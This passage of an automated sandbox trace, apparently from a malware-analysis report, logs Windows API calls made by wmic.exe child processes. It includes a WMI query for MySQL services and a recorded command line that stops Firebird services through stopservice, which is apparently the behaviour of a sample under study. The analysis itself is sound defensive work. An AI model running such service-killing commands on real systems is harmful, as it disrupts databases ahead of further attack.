cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0288.002] lstrlenW (lpString="LIST") returned 4 [0288.002] lstrlenW (lpString="call") returned 4 [0288.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0288.002] lstrlenW (lpString="SET") returned 3 [0288.002] lstrlenW (lpString="call") returned 4 [0288.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0288.002] lstrlenW (lpString="CALL") returned 4 [0288.003] lstrlenW (lpString="call") returned 4 [0288.003] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0288.003] ??0CHString@@QAE@XZ () returned 0x4bf918 [0288.003] GetCurrentThreadId () returned 0x11d8 [0288.003] malloc (_Size=0xc) returned 0x41acf0 [0288.003] malloc (_Size=0xc) returned 0x41ad08 [0288.003] malloc (_Size=0xc) returned 0x41ab10 [0288.003] malloc (_Size=0xc) returned 0x41ab28 [0288.003] malloc (_Size=0xc) returned 0x419808 [0288.003] SysStringLen (param_1="\\\\") returned 0x2 [0288.003] SysStringLen (param_1="NQDPDE") returned 0x6 [0288.003] malloc (_Size=0xc) returned 0x41cf70 [0288.003] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0288.003] SysStringLen (param_1="\\") returned 0x1 [0288.004] malloc (_Size=0xc) returned 0x41cf28 [0288.004] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0288.004] SysStringLen (param_1="root\\cimv2") returned 0xa [0288.004] free (_Block=0x41cf70) [0288.004] free (_Block=0x419808) [0288.004] free (_Block=0x41ab28) [0288.004] free (_Block=0x41ab10) [0288.004] free (_Block=0x41ad08) [0288.004] free (_Block=0x41acf0) [0288.004] malloc (_Size=0xc) returned 0x41cf40 [0288.004] malloc (_Size=0xc) returned 0x41cfe8 [0288.004] malloc (_Size=0xc) returned 0x41cfb8 [0288.004] WbemLocator:IWbemLocator:ConnectServer (in: This=0x7a47f8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x800ca8) returned 0x0 [0288.018] free (_Block=0x41cfb8) [0288.018] free (_Block=0x41cfe8) [0288.018] free (_Block=0x41cf40) [0288.018] CoSetProxyBlanket (pProxy=0x800ca8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0288.018] free (_Block=0x41cf28) [0288.018] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0288.018] ??0CHString@@QAE@XZ () returned 0x4bf910 [0288.018] GetCurrentThreadId () returned 0x11d8 [0288.018] malloc (_Size=0x38) returned 0x41c8f8 [0288.018] malloc (_Size=0x28) returned 0x41c938 [0288.018] malloc (_Size=0x28) returned 0x41c968 [0288.018] malloc (_Size=0x38) returned 0x41c998 [0288.018] malloc (_Size=0x38) returned 0x41c9d8 [0288.019] malloc (_Size=0x24) returned 0x41ca18 [0288.019] malloc (_Size=0xc) returned 0x41ab10 [0288.019] lstrlenA (lpString="") returned 0 [0288.019] malloc (_Size=0x2) returned 0x412ee8 [0288.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x412ee8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0288.019] free (_Block=0x412ee8) [0288.019] malloc (_Size=0x38) returned 0x41ca48 [0288.019] malloc (_Size=0x24) returned 0x41ca88 [0288.019] malloc (_Size=0xc) returned 0x41ab28 [0288.019] free (_Block=0x41ab10) [0288.019] IWbemServices:GetObject (in: This=0x800ca8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x4bf8e8*=0x0, ppCallResult=0x0 | out: ppObject=0x4bf8e8*=0x800300, ppCallResult=0x0) returned 0x0 [0288.098] malloc (_Size=0xc) returned 0x41acf0 [0288.098] IWbemClassObject:GetMethod (in: This=0x800300, wszName="stopservice", lFlags=0, ppInSignature=0x4bf904, ppOutSignature=0x4bf8e4 | out: ppInSignature=0x4bf904*=0x0, ppOutSignature=0x4bf8e4*=0x803738) returned 0x0 [0288.098] free (_Block=0x41acf0) [0288.098] IUnknown:Release (This=0x803738) returned 0x0 [0288.098] IUnknown:Release (This=0x800300) returned 0x0 [0288.100] ??0CHString@@QAE@XZ () returned 0x4bf7c8 [0288.100] GetCurrentThreadId () returned 0x11d8 [0288.100] malloc (_Size=0xc) returned 0x41ad08 [0288.100] lstrlenA (lpString="") returned 0 [0288.100] malloc (_Size=0x2) returned 0x412ee8 [0288.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x412ee8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0288.100] free (_Block=0x412ee8) [0288.100] malloc (_Size=0xc) returned 0x41ab10 [0288.100] lstrlenA (lpString="") returned 0 [0288.100] malloc (_Size=0x2) returned 0x412ee8 [0288.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x412ee8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0288.100] free (_Block=0x412ee8) [0288.100] malloc (_Size=0xc) returned 0x41acf0 [0288.100] free (_Block=0x41ab10) [0288.100] malloc (_Size=0xc) returned 0x41ab10 [0288.100] lstrlenA (lpString="SELECT * FROM ") returned 14 [0288.100] malloc (_Size=0x1e) returned 0x41cab8 [0288.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x41cab8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0288.100] free (_Block=0x41cab8) [0288.100] malloc (_Size=0xc) returned 0x419808 [0288.100] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0288.101] SysStringLen (param_1="Win32_Service") returned 0xd [0288.101] free (_Block=0x41ab10) [0288.101] malloc (_Size=0xc) returned 0x41ab10 [0288.101] malloc (_Size=0xc) returned 0x41cd78 [0288.101] lstrlenA (lpString=" WHERE ") returned 7 [0288.101] malloc (_Size=0x10) returned 0x41cca0 [0288.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x41cca0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0288.101] free (_Block=0x41cca0) [0288.101] malloc (_Size=0xc) returned 0x41ce20 [0288.101] SysStringLen (param_1=" WHERE ") returned 0x7 [0288.101] SysStringLen (param_1="name like '%%MySQL%%'") returned 0x15 [0288.101] malloc (_Size=0xc) returned 0x41cc88 [0288.101] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0288.101] SysStringLen (param_1=" WHERE name like '%%MySQL%%'") returned 0x1c [0288.101] free (_Block=0x419808) [0288.101] free (_Block=0x41ce20) [0288.101] free (_Block=0x41cd78) [0288.102] free (_Block=0x41ab10) [0288.102] malloc (_Size=0xc) returned 0x41ce08 [0288.102] IWbemServices:ExecQuery (in: This=0x800ca8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MySQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x4bf7d4 | out: ppEnum=0x4bf7d4*=0x8040e8) returned 0x0 [0288.130] free (_Block=0x41ce08) [0288.130] CoSetProxyBlanket (pProxy=0x8040e8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0288.155] IEnumWbemClassObject:Next (in: This=0x8040e8, lTimeout=-1, uCount=0x1, apObjects=0x4bf7d0, puReturned=0x4bf7c0 | out: apObjects=0x4bf7d0*=0x0, puReturned=0x4bf7c0*=0x0) returned 0x1 [0289.553] IUnknown:Release (This=0x8040e8) returned 0x0 [0289.556] free (_Block=0x41cc88) [0289.556] free (_Block=0x41acf0) [0289.556] free (_Block=0x41ad08) [0289.556] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0289.556] free (_Block=0x41ab28) [0289.556] free (_Block=0x41ca18) [0289.557] free (_Block=0x41c9d8) [0289.557] free (_Block=0x41c998) [0289.557] free (_Block=0x41c968) [0289.557] free (_Block=0x41c938) [0289.557] free (_Block=0x41ca88) [0289.557] free (_Block=0x41ca48) [0289.557] free (_Block=0x41c8f8) [0289.557] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0289.557] GetCurrentThreadId () returned 0x11d8 [0289.557] ??0CHString@@QAE@PBG@Z () returned 0x4bf988 [0289.557] ??YCHString@@QAEABV0@PBG@Z () returned 0x4bf988 [0289.557] malloc (_Size=0x800) returned 0x41d000 [0289.557] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x41d000, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0289.558] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0289.558] malloc (_Size=0x1c) returned 0x41c8f8 [0289.558] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x41c8f8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0289.558] __iob_func () returned 0x776f2608 [0289.558] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0289.558] __iob_func () returned 0x776f2608 [0289.558] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0289.560] free (_Block=0x41c8f8) [0289.560] free (_Block=0x41d000) [0289.560] ??1CHString@@QAE@XZ () returned 0x1 [0289.560] WbemLocator:IUnknown:Release (This=0x800ca8) returned 0x0 [0289.560] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0289.560] _kbhit () returned 0x0 [0289.569] free (_Block=0x41c108) [0289.569] free (_Block=0x41ac90) [0289.569] free (_Block=0x41ac18) [0289.569] free (_Block=0x41ad50) [0289.569] free (_Block=0x41ac60) [0289.569] free (_Block=0x41b048) [0289.569] free (_Block=0x41c0e0) [0289.569] free (_Block=0x419da8) [0289.569] free (_Block=0x41c150) [0289.569] free (_Block=0x41adc8) [0289.569] free (_Block=0x412d40) [0289.569] free (_Block=0x410520) [0289.569] free (_Block=0x41cbc8) [0289.569] free (_Block=0x41ade0) [0289.569] free (_Block=0x41acc0) [0289.569] free (_Block=0x41cb88) [0289.569] free (_Block=0x41cb48) [0289.569] free (_Block=0x41aca8) [0289.570] free (_Block=0x41acd8) [0289.570] free (_Block=0x41ac30) [0289.570] free (_Block=0x41cb18) [0289.570] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0289.570] free (_Block=0x41b3d0) [0289.570] free (_Block=0x41ab88) [0289.570] free (_Block=0x410568) [0289.570] free (_Block=0x41abb8) [0289.570] free (_Block=0x41c118) [0289.570] free (_Block=0x41ad68) [0289.570] free (_Block=0x412d60) [0289.570] free (_Block=0x4126b0) [0289.570] free (_Block=0x4126f8) [0289.570] free (_Block=0x412740) [0289.570] free (_Block=0x41adf8) [0289.570] free (_Block=0x4127c8) [0289.570] free (_Block=0x410508) [0289.570] free (_Block=0x412b40) [0289.570] free (_Block=0x4104f0) [0289.570] free (_Block=0x4129c0) [0289.570] free (_Block=0x4104d8) [0289.570] free (_Block=0x4129a0) [0289.570] free (_Block=0x412908) [0289.571] free (_Block=0x412920) [0289.571] free (_Block=0x4128d0) [0289.571] free (_Block=0x4128e8) [0289.571] free (_Block=0x412940) [0289.571] free (_Block=0x412958) [0289.571] free (_Block=0x4104a0) [0289.571] free (_Block=0x4104b8) [0289.571] free (_Block=0x412860) [0289.571] free (_Block=0x412878) [0289.571] free (_Block=0x412828) [0289.571] free (_Block=0x412840) [0289.571] free (_Block=0x412898) [0289.571] free (_Block=0x4128b0) [0289.571] free (_Block=0x4127f0) [0289.571] free (_Block=0x412808) [0289.571] free (_Block=0x4127a0) [0289.571] free (_Block=0x4111f8) [0289.571] free (_Block=0x41afc0) [0289.571] WbemLocator:IUnknown:Release (This=0x7a47f8) returned 0x2 [0289.572] WbemLocator:IUnknown:Release (This=0x7aabc8) returned 0x0 [0289.572] WbemLocator:IUnknown:Release (This=0x7a47f8) returned 0x1 [0289.572] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0289.572] WbemLocator:IUnknown:Release (This=0x7a47f8) returned 0x0 [0289.572] free (_Block=0x41adb0) [0289.572] free (_Block=0x41ac48) [0289.572] free (_Block=0x412d20) [0289.572] free (_Block=0x41ac00) [0289.573] free (_Block=0x41ac78) [0289.573] free (_Block=0x412a20) [0289.573] free (_Block=0x41ae10) [0289.573] free (_Block=0x41ae40) [0289.573] free (_Block=0x412b80) [0289.573] free (_Block=0x41ab40) [0289.573] free (_Block=0x41ad80) [0289.573] free (_Block=0x4129e0) [0289.573] free (_Block=0x41aea0) [0289.573] free (_Block=0x41aeb8) [0289.573] free (_Block=0x412aa0) [0289.573] free (_Block=0x41aed0) [0289.573] free (_Block=0x41ae70) [0289.573] free (_Block=0x412be0) [0289.573] free (_Block=0x41ab70) [0289.573] free (_Block=0x41ad38) [0289.573] free (_Block=0x412c60) [0289.573] free (_Block=0x41ad98) [0289.573] free (_Block=0x41abe8) [0289.574] free (_Block=0x412c40) [0289.574] free (_Block=0x4198e0) [0289.574] free (_Block=0x41ae28) [0289.574] free (_Block=0x412c00) [0289.574] free (_Block=0x41ae88) [0289.574] free (_Block=0x41ae58) [0289.574] free (_Block=0x412ce0) [0289.574] free (_Block=0x41ab58) [0289.574] free (_Block=0x41aba0) [0289.574] free (_Block=0x412d00) [0289.574] free (_Block=0x41ad20) [0289.574] free (_Block=0x41abd0) [0289.574] free (_Block=0x412c20) [0289.574] free (_Block=0x419868) [0289.574] free (_Block=0x419958) [0289.574] free (_Block=0x412ba0) [0289.574] free (_Block=0x419898) [0289.574] free (_Block=0x419850) [0289.574] free (_Block=0x412cc0) [0289.575] free (_Block=0x419880) [0289.575] free (_Block=0x4198f8) [0289.575] free (_Block=0x412c80) [0289.575] free (_Block=0x4199b8) [0289.575] free (_Block=0x419928) [0289.575] free (_Block=0x412a00) [0289.575] free (_Block=0x419970) [0289.575] free (_Block=0x419988) [0289.575] free (_Block=0x412bc0) [0289.575] free (_Block=0x4197f0) [0289.575] free (_Block=0x419820) [0289.575] free (_Block=0x412b60) [0289.576] free (_Block=0x419910) [0289.576] free (_Block=0x419940) [0289.576] free (_Block=0x412ca0) [0289.576] free (_Block=0x419838) [0289.576] free (_Block=0x4199a0) [0289.576] free (_Block=0x412a60) [0289.576] free (_Block=0x4198b0) [0289.576] free (_Block=0x4198c8) [0289.576] free (_Block=0x412a80) [0289.576] CoUninitialize () [0289.626] exit (_Code=0) [0289.626] free (_Block=0x41aee8) [0289.626] free (_Block=0x411000) [0289.626] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0289.626] free (_Block=0x412e10) [0289.626] free (_Block=0x4127e0) [0289.626] free (_Block=0x410fe0) [0289.626] free (_Block=0x410fc0) [0289.626] free (_Block=0x410f90) [0289.626] free (_Block=0x410f70) [0289.626] free (_Block=0x410f40) [0289.626] free (_Block=0x410f00) [0289.627] free (_Block=0x410ee0) [0289.627] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0289.627] free (_Block=0x412b20) Thread: id = 258 os_tid = 0xfa8 Thread: id = 259 os_tid = 0xfb0 Thread: id = 260 os_tid = 0x125c Thread: id = 261 os_tid = 0xc2c Process: id = "22" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0xb978000" os_pid = "0x123c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 263 os_tid = 0x11d4 [0289.923] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0289.923] __set_app_type (_Type=0x1) [0289.923] __p__fmode () returned 0x776f3c14 [0289.923] __p__commode () returned 0x776f49ec [0289.923] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0289.923] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0289.924] ??0CHString@@QAE@XZ () returned 0xa685ec [0289.924] malloc (_Size=0x18) returned 0x3810ee8 [0289.924] malloc (_Size=0x38) returned 0x3810f08 [0289.924] malloc (_Size=0x28) returned 0x3810f48 [0289.924] malloc (_Size=0x18) returned 0x3810f78 [0289.924] malloc (_Size=0x24) returned 0x3810f98 [0289.924] malloc (_Size=0x18) returned 0x3810fc8 [0289.924] malloc (_Size=0x18) returned 0x3810fe8 [0289.924] ??0CHString@@QAE@XZ () returned 0xa688fc [0289.925] malloc (_Size=0x18) returned 0x3811008 [0289.925] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0289.925] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0289.925] _onexit (_Func=0xa5f370) returned 0xa5f370 [0289.925] _onexit (_Func=0xa5f380) returned 0xa5f380 [0289.925] _onexit (_Func=0xa5f390) returned 0xa5f390 [0289.925] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0289.925] ResolveDelayLoadedAPI () returned 0x74a22590 [0289.926] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0289.931] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0289.944] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x35447f0) returned 0x0 [0289.974] GetCurrentProcess () returned 0xffffffff [0289.974] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2f8f6b4 | out: TokenHandle=0x2f8f6b4*=0x194) returned 1 [0289.974] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2f8f6b0 | out: TokenInformation=0x0, ReturnLength=0x2f8f6b0) returned 0 [0289.974] malloc (_Size=0x118) returned 0x38126b0 [0289.974] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x38126b0, TokenInformationLength=0x118, ReturnLength=0x2f8f6b0 | out: TokenInformation=0x38126b0, ReturnLength=0x2f8f6b0) returned 1 [0289.974] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x38126b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0289.974] free (_Block=0x38126b0) [0289.974] CloseHandle (hObject=0x194) returned 1 [0289.974] malloc (_Size=0x40) returned 0x38126b0 [0289.974] malloc (_Size=0x40) returned 0x38126f8 [0289.975] malloc (_Size=0x40) returned 0x3812740 [0289.975] SetThreadUILanguage (LangId=0x0) returned 0x3070409 [0289.979] _vsnwprintf (in: _Buffer=0x3812740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x2f8f63c | out: _Buffer="ms_409") returned 6 [0289.979] malloc (_Size=0x20) returned 0x3811200 [0289.979] GetComputerNameW (in: lpBuffer=0x3811200, nSize=0x2f8f6a0 | out: lpBuffer="NQDPDE", nSize=0x2f8f6a0) returned 1 [0289.979] lstrlenW (lpString="NQDPDE") returned 6 [0289.979] malloc (_Size=0xe) returned 0x3812788 [0289.979] lstrlenW (lpString="NQDPDE") returned 6 [0289.979] ResolveDelayLoadedAPI () returned 0x7444db00 [0289.980] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x2f8f6b4 | out: lpNameBuffer=0x0, nSize=0x2f8f6b4) returned 0x307d000 [0289.981] GetLastError () returned 0xea [0289.981] malloc (_Size=0x1e) returned 0x38127a0 [0289.981] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x38127a0, nSize=0x2f8f6b4 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x2f8f6b4) returned 0x1 [0289.982] lstrlenW (lpString="") returned 0 [0289.982] lstrlenW (lpString="NQDPDE") returned 6 [0289.982] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0289.984] lstrlenW (lpString=".") returned 1 [0289.984] lstrlenW (lpString="NQDPDE") returned 6 [0289.984] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0289.984] lstrlenW (lpString="LOCALHOST") returned 9 [0289.984] lstrlenW (lpString="NQDPDE") returned 6 [0289.984] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0289.984] lstrlenW (lpString="NQDPDE") returned 6 [0289.984] lstrlenW (lpString="NQDPDE") returned 6 [0289.985] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0289.985] free (_Block=0x3812788) [0289.985] lstrlenW (lpString="NQDPDE") returned 6 [0289.985] malloc (_Size=0xe) returned 0x3812788 [0289.985] lstrlenW (lpString="NQDPDE") returned 6 [0289.985] lstrlenW (lpString="NQDPDE") returned 6 [0289.985] malloc (_Size=0xe) returned 0x38127c8 [0289.985] lstrlenW (lpString="NQDPDE") returned 6 [0289.985] malloc (_Size=0x4) returned 0x38127e0 [0289.985] malloc (_Size=0xc) returned 0x38127f0 [0289.985] ResolveDelayLoadedAPI () returned 0x7745b870 [0289.998] malloc (_Size=0x18) returned 0x3812808 [0289.998] malloc (_Size=0xc) returned 0x3812828 [0289.998] SysStringLen (param_1="IDENTIFY") returned 0x8 [0289.998] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0289.998] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0289.998] SysStringLen (param_1="IDENTIFY") returned 0x8 [0289.999] malloc (_Size=0x18) returned 0x3812840 [0289.999] malloc (_Size=0xc) returned 0x3812860 [0289.999] SysStringLen (param_1="IMPERSONATE") returned 0xb [0289.999] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0289.999] SysStringLen (param_1="IMPERSONATE") returned 0xb [0289.999] SysStringLen (param_1="IDENTIFY") returned 0x8 [0289.999] SysStringLen (param_1="IDENTIFY") returned 0x8 [0289.999] SysStringLen (param_1="IMPERSONATE") returned 0xb [0289.999] malloc (_Size=0x18) returned 0x3812878 [0289.999] malloc (_Size=0xc) returned 0x3812898 [0289.999] SysStringLen (param_1="DELEGATE") returned 0x8 [0289.999] SysStringLen (param_1="IDENTIFY") returned 0x8 [0289.999] SysStringLen (param_1="DELEGATE") returned 0x8 [0289.999] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0289.999] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0289.999] SysStringLen (param_1="DELEGATE") returned 0x8 [0289.999] malloc (_Size=0x18) returned 0x38128b0 [0289.999] malloc (_Size=0xc) returned 0x38128d0 [0289.999] malloc (_Size=0x18) returned 0x38128e8 [0289.999] malloc (_Size=0xc) returned 0x3812908 [0289.999] SysStringLen (param_1="NONE") returned 0x4 [0289.999] SysStringLen (param_1="DEFAULT") returned 0x7 [0289.999] SysStringLen (param_1="DEFAULT") returned 0x7 [0289.999] SysStringLen (param_1="NONE") returned 0x4 [0289.999] malloc (_Size=0x18) returned 0x3812920 [0289.999] malloc (_Size=0xc) returned 0x3812940 [0290.000] SysStringLen (param_1="CONNECT") returned 0x7 [0290.000] SysStringLen (param_1="DEFAULT") returned 0x7 [0290.000] malloc (_Size=0x18) returned 0x3812958 [0290.000] malloc (_Size=0xc) returned 0x38104a0 [0290.000] SysStringLen (param_1="CALL") returned 0x4 [0290.000] SysStringLen (param_1="DEFAULT") returned 0x7 [0290.000] SysStringLen (param_1="CALL") returned 0x4 [0290.000] SysStringLen (param_1="CONNECT") returned 0x7 [0290.000] malloc (_Size=0x18) returned 0x38104b8 [0290.000] malloc (_Size=0xc) returned 0x38104d8 [0290.001] SysStringLen (param_1="PKT") returned 0x3 [0290.001] SysStringLen (param_1="DEFAULT") returned 0x7 [0290.001] SysStringLen (param_1="PKT") returned 0x3 [0290.001] SysStringLen (param_1="NONE") returned 0x4 [0290.001] SysStringLen (param_1="NONE") returned 0x4 [0290.001] SysStringLen (param_1="PKT") returned 0x3 [0290.001] malloc (_Size=0x18) returned 0x3812ca0 [0290.001] malloc (_Size=0xc) returned 0x38104f0 [0290.001] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0290.001] SysStringLen (param_1="DEFAULT") returned 0x7 [0290.001] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0290.001] SysStringLen (param_1="NONE") returned 0x4 [0290.001] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0290.001] SysStringLen (param_1="PKT") returned 0x3 [0290.001] SysStringLen (param_1="PKT") returned 0x3 [0290.001] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0290.001] malloc (_Size=0x18) returned 0x3812b00 [0290.001] malloc (_Size=0xc) returned 0x3810508 [0290.001] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0290.001] SysStringLen (param_1="DEFAULT") returned 0x7 [0290.001] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0290.001] SysStringLen (param_1="PKT") returned 0x3 [0290.001] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0290.001] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0290.001] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0290.001] SysStringLen (param_1="PKTPRIVACY") returned 0xa 